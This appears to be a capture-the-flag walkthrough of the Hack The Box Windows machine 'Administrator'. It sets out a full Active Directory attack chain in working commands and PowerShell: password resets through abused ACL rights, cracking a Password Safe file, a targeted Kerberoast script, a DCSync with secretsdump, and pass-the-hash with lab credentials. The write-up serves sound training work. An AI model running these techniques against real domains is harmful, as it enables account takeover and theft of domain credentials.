This is a walkthrough of the machine Administrator from Hack The Box.
Machine information:
- Difficulty: Medium
- OS: Windows
- Area of interest: Enterprise Network, Vulnerability Assessment, Active Directory, Protocols, Common Services, Security Tools
- Vulnerability: Group Membership, Misconfiguration
- Language: PowerShell
- Technology: SMB, FTP, Kerberos, WinRM
- Technique: Reconnaissance, Password Cracking, Kerberoasting
Nmap
sudo nmap -A -sC -sV --open -v -p- <IP>
Starting off with an Nmap scan, we discover that the machine is a domain controller, and that the domain name is administrator.htb.

Initial access
We are provided with the following credentials to start off the box:
Olivia
ichliebedich
Firstly, we can use evil-winrm to get a shell as olivia:
evil-winrm -i <IP> -u olivia -p ichliebedich
Domain enumeration with BloodHound
Owning michael
Next, we upload the SharpHound collector through evil-winrm, run it, and ingest the resulting zip into BloodHound.
Looking at olivia's outbound object controls, we discover that she has GenericAll over michael. GenericAll is full control of the object, which includes resetting its password:

Clicking on the GenericAll edge in BloodHound lists several ways to abuse this right; for our purposes we simply reset michael's password:

net user michael michael123! /domain
Resetting michael's password lets us log in over WinRM as this user, because michael is also a member of the Remote Management Users group (without that membership a reset would only give us credentials, not a shell):

evil-winrm -i <IP> -u michael -p michael123!
Owning benjamin
After using evil-winrm to get access as michael, we will go back to BloodHound and see what else we can abuse to further our access.
Looking at michael's outbound object controls, we find that we have ForceChangePassword over benjamin:

Clicking on the ForceChangePassword edge, we can find a method to abuse this right with PowerView:

First, we will upload PowerView via evil-winrm, and import it:
upload powerview.ps1
Import-Module .\powerview.ps1
And then reset benjamin's password:
$UserPassword = ConvertTo-SecureString 'benjamin123!' -AsPlainText -Force
Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword
FTP Enumeration
The user benjamin is not a member of the Remote Management Users group, so the new password gives us no WinRM shell. Checking the credentials against other services with netexec, however, shows that they are valid for FTP on the machine:
netexec ftp <IP> -u benjamin -p 'benjamin123!'

Logging in over FTP with benjamin's credentials, we find a single file named Backup.psafe3, which we download with get for offline cracking:
ftp <IP>

This is a Password Safe v3 database, protected by a master password.
hashcat mode 5200 (Password Safe v3) takes the .psafe3 file directly; running it against rockyou recovers the master password tekieromucho:
hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt --force

To open it, we can use the pwsafe command, and enter the password when prompted:
pwsafe Backup.psafe3
The file contains credentials for three additional users:

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
Initial access as emily for the user flag
emily is a member of the Remote Management Users group, so we can use her credentials with evil-winrm and read the user.txt flag:
evil-winrm -i <IP> -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Owning ethan
Going back to BloodHound, we find that emily has GenericWrite over ethan. GenericWrite does not let us reset the password, but it does let us write ethan's servicePrincipalName attribute; once the account has an SPN the KDC will issue a service ticket encrypted with ethan's password-derived key, which we can crack offline (a targeted Kerberoast):


Running targetedKerberoast.py with emily's credentials, we obtain a TGS hash for ethan:
faketime "$(ntpdate -q <IP> | cut -d ' ' -f 1,2)" ./targetedKerberoast.py -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --dc-ip <IP>
This step is finicky: Kerberos rejects requests whose timestamp differs from the DC's clock by more than the permitted skew, so without adjustment you will most likely get "Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)". Wrapping the script in faketime with the DC's current time taken from ntpdate, as shown above, fixes this.
Using hashcat, we find ethan's password - limpbizkit:
hashcat -m 13100 ethan.kerberoast /usr/share/wordlists/rockyou.txt --force
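The same targeted Kerberoast can be done from emily's evil-winrm shell with the PowerView module uploaded earlier, instead of targetedKerberoast.py; because the ticket is requested from the domain-joined host, the clock-skew problem does not arise. This is an added example and not part of the original walkthrough: the SPN string is an arbitrary placeholder chosen here (any value works, only the GenericWrite right on ethan matters), and the output file name is an assumption.

```powershell
# Added example: targeted Kerberoast of ethan with PowerView from emily's shell.
# Not from the original walkthrough; the SPN value and file name are placeholders.
Import-Module .\powerview.ps1

$Target = 'ethan'
$Spn    = 'nonexistent/kerberoast.administrator.htb'   # assumption: placeholder SPN

# 1. Record the current SPNs so the account can be put back exactly as found.
$Before = (Get-DomainUser -Identity $Target -Properties serviceprincipalname).serviceprincipalname
"SPNs before: $($Before -join ', ')"

# 2. GenericWrite covers servicePrincipalName even though it cannot reset the password.
#    Once the account carries an SPN, the KDC will issue a service ticket for it.
Set-DomainObject -Identity $Target -Set @{ serviceprincipalname = $Spn }

# 3. Request the TGS. Its encrypted part is protected with ethan's password-derived key,
#    which is what hashcat attacks. -OutputFormat Hashcat yields the $krb5tgs$ line.
Get-DomainSPNTicket -SPN $Spn -OutputFormat Hashcat |
    Select-Object -ExpandProperty Hash |
    Out-File -Encoding ascii .\ethan.kerberoast

# 4. Clean up: restore the original SPN list, or clear the attribute if there was none,
#    so the object is left as we found it.
if ($Before) {
    Set-DomainObject -Identity $Target -Set @{ serviceprincipalname = $Before }
} else {
    Set-DomainObject -Identity $Target -Clear serviceprincipalname
}
```

Pull the file back with evil-winrm's download command and crack it as above. Writing the hash to the DC's disk leaves an artifact; printing it to the console and copying it out avoids that. Check the prefix of the hash before choosing the hashcat mode: $krb5tgs$23$ is RC4 and cracks with -m 13100, while $krb5tgs$18$ (AES256) needs -m 19700 and $krb5tgs$17$ (AES128) needs -m 19600.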

Privilege escalation
Going back to BloodHound for the final time, we find that ethan has GetChangesAll and GetChanges over the domain object. Together these two replication extended rights are what a domain controller uses to replicate secrets, so holding both allows a DCSync: we ask the DC to replicate account hashes to us as if we were another DC:
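Every edge in this chain (GenericAll on michael, ForceChangePassword on benjamin, GenericWrite on ethan, and the two replication rights on the domain head) is a single ACE in a DACL, so it can be re-checked directly against the directory before anything is abused, rather than trusting the graph alone. The following is an added example, not code from the original walkthrough: it defines a small PowerView wrapper (the function name and the rights regex are my own choices) and runs it from emily's shell, which can read every DACL involved. Account names and the domain DN are taken from the page.

```powershell
# Added example: confirm each BloodHound edge against the live DACLs with PowerView.
# Not from the original walkthrough; Get-RightsHeldBy is a helper defined here.
Import-Module .\powerview.ps1

function Get-RightsHeldBy {
    param(
        [Parameter(Mandatory)][string]$Principal,   # account whose token we hold
        [Parameter(Mandatory)][string]$Target       # samAccountName or DN of the object
    )
    # Every SID the principal carries: its own SID, its groups (PowerView resolves these
    # from tokenGroups, so nested membership counts), plus the well-known SIDs every
    # authenticated domain user holds (Everyone, Authenticated Users).
    $Sids  = @((Get-DomainUser -Identity $Principal -Properties objectsid).objectsid)
    $Sids += (Get-DomainGroup -MemberIdentity $Principal -Properties objectsid).objectsid
    $Sids += 'S-1-1-0', 'S-1-5-11'

    # Keep only allow-ACEs granted to one of those SIDs that carry an abusable right.
    # -ResolveGUIDs turns extended-right GUIDs into names such as
    # User-Force-Change-Password or DS-Replication-Get-Changes-All.
    $Abusable = 'GenericAll|GenericWrite|WriteOwner|WriteDacl|WriteProperty|ExtendedRight|Self'
    Get-DomainObjectAcl -Identity $Target -ResolveGUIDs |
        Where-Object { $_.AceQualifier -eq 'AccessAllowed' -and
                       $Sids -contains $_.SecurityIdentifier.Value -and
                       $_.ActiveDirectoryRights -match $Abusable } |
        Select-Object @{ n = 'Principal'; e = { $Principal } },
                      @{ n = 'Trustee';   e = { ConvertFrom-SID $_.SecurityIdentifier.Value } },
                      @{ n = 'Target';    e = { $_.ObjectDN } },
                      ActiveDirectoryRights, ObjectAceType
}

# The chain from the walkthrough, in order. The Trustee column shows whether the right
# is granted to the user directly or inherited through one of its groups.
Get-RightsHeldBy -Principal olivia  -Target michael     # re-checks the GenericAll edge
Get-RightsHeldBy -Principal michael -Target benjamin    # re-checks ForceChangePassword
Get-RightsHeldBy -Principal emily   -Target ethan       # re-checks GenericWrite

# DCSync needs both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on
# the domain head, so filter the domain object's ACEs down to the replication rights.
Get-RightsHeldBy -Principal ethan -Target 'DC=administrator,DC=htb' |
    Where-Object { $_.ObjectAceType -like 'DS-Replication-Get-Changes*' }

# Group membership decides whether a password reset turns into a shell at all:
# only members of this group can log in through WinRM.
(Get-DomainGroupMember -Identity 'Remote Management Users' -Recurse).MemberName
```

If an edge is missing from this output but present in BloodHound, the collection is stale or the right comes through an owner or builtin-group path the filter does not model; re-collect before relying on it.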



Executing the attack with impacket-secretsdump (which by default dumps every account in NTDS; add -just-dc-user Administrator to pull only the one we need), we obtain Administrator's NT hash. The hash alone is enough to pass-the-hash with evil-winrm and read the root.txt flag:
impacket-secretsdump 'administrator.htb'/'ethan':'limpbizkit'@<IP>

evil-winrm -i <IP> -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

